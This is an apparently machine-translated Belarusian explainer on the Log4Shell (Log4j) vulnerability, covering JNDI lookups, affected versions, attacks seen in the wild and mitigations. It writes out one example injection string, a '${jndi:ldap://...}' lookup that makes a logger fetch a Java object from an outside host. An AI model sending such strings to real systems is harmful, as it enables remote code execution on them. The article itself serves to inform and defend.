Змест[Схаваць][Паказаць]
У канцы лістапада 2021 года мы выявілі вялікую пагрозу кібербяспецы. Гэты эксплойт можа паўплываць на мільёны камп'ютэрных сістэм па ўсім свеце.
Гэта кіраўніцтва па ўразлівасці Log4j і аб тым, як недагледжаная хіба дызайну пакінула больш за 90% сусветных камп'ютэрных службаў адкрытымі для нападаў.
Apache Log4j - гэта ўтыліта для вядзення часопісаў з адкрытым зыходным кодам на аснове Java, распрацаваная Apache Software Foundation. Першапачаткова напісаны Ceki Gülcü у 2001 годзе, цяпер ён з'яўляецца часткай Apache Logging Services, праекта Apache Software Foundation.
Кампаніі па ўсім свеце выкарыстоўваюць бібліятэку Log4j для ўключэння ўваходу ў свае прыкладанні. Насамрэч, бібліятэка Java настолькі паўсюдная, што вы можаце знайсці яе ў праграмах Amazon, Microsoft, Google і іншых.
Вядомасць бібліятэкі азначае, што любая патэнцыйная хіба ў кодзе можа зрабіць мільёны кампутараў адкрытымі для ўзлому. 24 лістапада 2021 г. а воблачная бяспека даследчык, які працуе на Alibaba, выявіў жудасны недахоп.
Уразлівасць Log4j, таксама вядомая як Log4Shell, існавала незаўважанай з 2013 года. Уразлівасць дазваляла зламыснікам запускаць код у пацярпелых сістэмах, на якіх працуе Log4j. Гэта было публічна абнародавана 9 снежня 2021 года
Эксперты галіны называюць недахоп Log4Shell самая вялікая ўразлівасць за апошні час.
На працягу тыдня пасля публікацыі ўразлівасці каманды кібербяспекі выявілі мільёны нападаў. Некаторыя даследчыкі нават назіралі частату больш за сто прыступаў у хвіліну.
Як гэта працуе?
Каб зразумець, чаму Log4Shell такі небяспечны, нам трэба зразумець, на што ён здольны.
Уразлівасць Log4Shell дазваляе выконваць адвольны код, што ў асноўным азначае, што зламыснік можа выканаць любую каманду або код на мэтавай машыне.
Як гэта дасягаецца?
Спачатку нам трэба зразумець, што такое JNDI.
Інтэрфейс імёнаў і каталогаў Java (JNDI) - гэта служба Java, якая дазваляе праграмам Java выяўляць і шукаць даныя і рэсурсы праз імя. Гэтыя службы каталогаў важныя, таму што яны забяспечваюць арганізаваны набор запісаў для распрацоўшчыкаў, да якіх лёгка спасылацца пры стварэнні прыкладанняў.
JNDI можа выкарыстоўваць розныя пратаколы для доступу да пэўнага каталога. Адным з такіх пратаколаў з'яўляецца палегчаны пратакол доступу да каталогаў, або LDAP.
Пры запісе радка, log4j выконвае замены радкоў, калі яны сутыкаюцца з выразамі формы ${prefix:name}
.
Напрыклад, Text: ${java:version}
можа быць зарэгістраваны як Тэкст: Java версія 1.8.0_65. Такія замены - звычайная справа.
У нас таксама могуць быць такія выразы, як Text: ${jndi:ldap://example.com/file}
які выкарыстоўвае сістэму JNDI для загрузкі аб'екта Java з URL праз пратакол LDAP.
Гэта эфектыўна загружае дадзеныя, якія паступаюць з гэтага URL, у машыну. Любы патэнцыйны хакер можа размясціць шкоднасны код на агульнадаступным URL і чакаць, пакуль машыны, якія выкарыстоўваюць Log4j, зарэгіструюць яго.
Паколькі змесціва паведамленняў часопіса змяшчае дадзеныя, якія кантралююцца карыстальнікам, хакеры могуць устаўляць свае ўласныя спасылкі JNDI, якія паказваюць на серверы LDAP, якімі яны кіруюць. Гэтыя серверы LDAP могуць быць поўныя шкоднасных аб'ектаў Java, якія JNDI можа выканаць праз уразлівасць.
Што робіць гэта яшчэ горш, так гэта тое, што не мае значэння, з'яўляецца прыкладанне серверным або кліенцкім.
Пакуль ёсць спосаб для рэгістратара прачытаць шкоднасны код зламысніка, праграма па-ранейшаму адкрыта для эксплойтаў.
Хто пацярпеў?
Уразлівасць закранае ўсе сістэмы і службы, якія выкарыстоўваюць APache Log4j, з версіямі 2.0 да 2.14.1 уключна.
Некалькі экспертаў па бяспецы паведамляюць, што ўразлівасць можа паўплываць на шэраг прыкладанняў, якія выкарыстоўваюць Java.
Упершыню недахоп быў выяўлены ў відэагульні Minecraft, якая належыць Microsoft. Microsoft заклікала сваіх карыстальнікаў абнавіць праграмнае забеспячэнне Minecraft версіі Java, каб прадухіліць любую рызыку.
Джэн Істэрлі, дырэктар Агенцтва па кібербяспецы і бяспецы інфраструктуры (CISA), кажа, што пастаўшчыкі маюць галоўная адказнасць каб прадухіліць выкарыстанне гэтай уразлівасці канчатковымі карыстальнікамі ад зламыснікаў.
«Пастаўшчыкі таксама павінны мець зносіны са сваімі кліентамі, каб пераканацца, што канчатковыя карыстальнікі ведаюць, што іх прадукт утрымлівае гэтую ўразлівасць, і павінны аддаваць прыярытэт абнаўленням праграмнага забеспячэння».
Паведамляецца, што атакі ўжо пачаліся. Symantec, кампанія, якая пастаўляе праграмнае забеспячэнне для кібербяспекі, назірала розную колькасць запытаў на атаку.
Вось некалькі прыкладаў тыпаў нападаў, якія выявілі даследчыкі:
- ботнеты
Ботнеты - гэта сетка кампутараў, якія знаходзяцца пад кантролем аднаго боку, які атакаваў. Яны дапамагаюць выконваць DDoS-атакі, красці даныя і іншыя махлярствы. Даследчыкі назіралі ботнет Muhstik у скрыптах абалонкі, спампаваных з эксплойта Log4j.
- Траян XMRig Miner
XMRig - гэта майнер крыптавалют з адкрытым зыходным кодам, які выкарыстоўвае працэсары для здабычы токенаў Monero. Кіберзлачынцы могуць усталёўваць XMRig на прылады людзей, каб яны маглі выкарыстоўваць іх вылічальную магутнасць без іх ведама.
- Праграма-вымагальнік Khonsari
Праграмы-вымагальнікі адносяцца да формы шкоднасных праграм, прызначаных для шыфраваць файлы на кампутары. Затым зламыснікі могуць запатрабаваць аплату ў абмен на вяртанне доступу да зашыфраваных файлаў. Даследчыкі выявілі праграму-вымагальнік Khonsari ў атаках Log4Shell. Яны арыентаваны на серверы Windows і выкарыстоўваюць платформу .NET.
Што будзе далей?
Эксперты прагназуюць, што для поўнага выпраўлення хаосу, выкліканага ўразлівасцю Log4J, могуць спатрэбіцца месяцы ці нават гады.
Гэты працэс прадугледжвае абнаўленне кожнай закранутай сістэмы выпраўленай версіяй. Нават калі ўсе гэтыя сістэмы выпраўлены, па-ранейшаму існуе пагроза магчымых бэкдораў, якія хакеры, магчыма, ужо дадалі ў акно, што серверы адкрыты для атакі.
Шмат рашэнні і змякчэнні наступстваў існуе, каб прадухіліць выкарыстанне гэтай памылкай прыкладанняў. Новая версія Log4j 2.15.0-rc1 змяніла розныя налады, каб паменшыць гэтую ўразлівасць.
Усе функцыі, якія выкарыстоўваюць JNDI, будуць адключаны па змаўчанні, а таксама абмежаваны аддалены пошук. Адключэнне функцыі пошуку ў наладах Log4j дапаможа знізіць рызыку магчымых эксплойтаў.
За межамі Log4j усё яшчэ існуе патрэба ў больш шырокім плане прадухілення эксплойтаў з адкрытым зыходным кодам.
Раней у траўні белы дом выпусціў ўрадавая пастанова які накіраваны на паляпшэнне нацыянальнай кібербяспекі. Ён уключаў палажэнне аб праграмным спісе матэрыялаў (SBOM), які па сутнасці быў афіцыйным дакументам, які змяшчаў спіс усіх элементаў, неабходных для стварэння прыкладання.
Гэта ўключае ў сябе такія часткі, як з адкрытым зыходным кодам пакеты, залежнасці і API, якія выкарыстоўваюцца для распрацоўкі. Хоць ідэя SBOM карысная для празрыстасці, ці сапраўды яна дапаможа спажыўцу?
Абнаўленне залежнасцяў можа быць занадта клопатам. Кампаніі могуць проста выбраць штрафы, а не рызыкаваць марнаваць дадатковы час на пошук альтэрнатыўных пакетаў. Магчыма, гэтыя SBOM будуць карысныя толькі ў тым выпадку, калі іх сфера абмяжоўваецца далей.
заключэнне
Праблема Log4j - гэта больш, чым проста тэхнічная праблема для арганізацый.
Кіраўнікі прадпрыемстваў павінны ведаць пра патэнцыйныя рызыкі, якія могуць узнікнуць, калі іх серверы, прадукты ці паслугі залежаць ад кода, які яны самі не падтрымліваюць.
Спадзяванне на прыкладанні з адкрытым зыходным кодам і староннія праграмы заўсёды звязана з пэўнай доляй рызыкі. Кампаніі павінны разгледзець пытанне аб распрацоўцы стратэгій зніжэння рызыкі да таго, як з'явяцца новыя пагрозы.
Большая частка Інтэрнэту абапіраецца на праграмнае забеспячэнне з адкрытым зыходным кодам, якое падтрымліваецца тысячамі добраахвотнікаў па ўсім свеце.
Калі мы хочам захаваць Інтэрнэт у бяспечным месцы, урады і карпарацыі павінны інвеставаць у фінансаванне адкрытых зыходных кодаў і агенцтваў па кібербяспецы, такіх як СНД.
Пакінуць каментар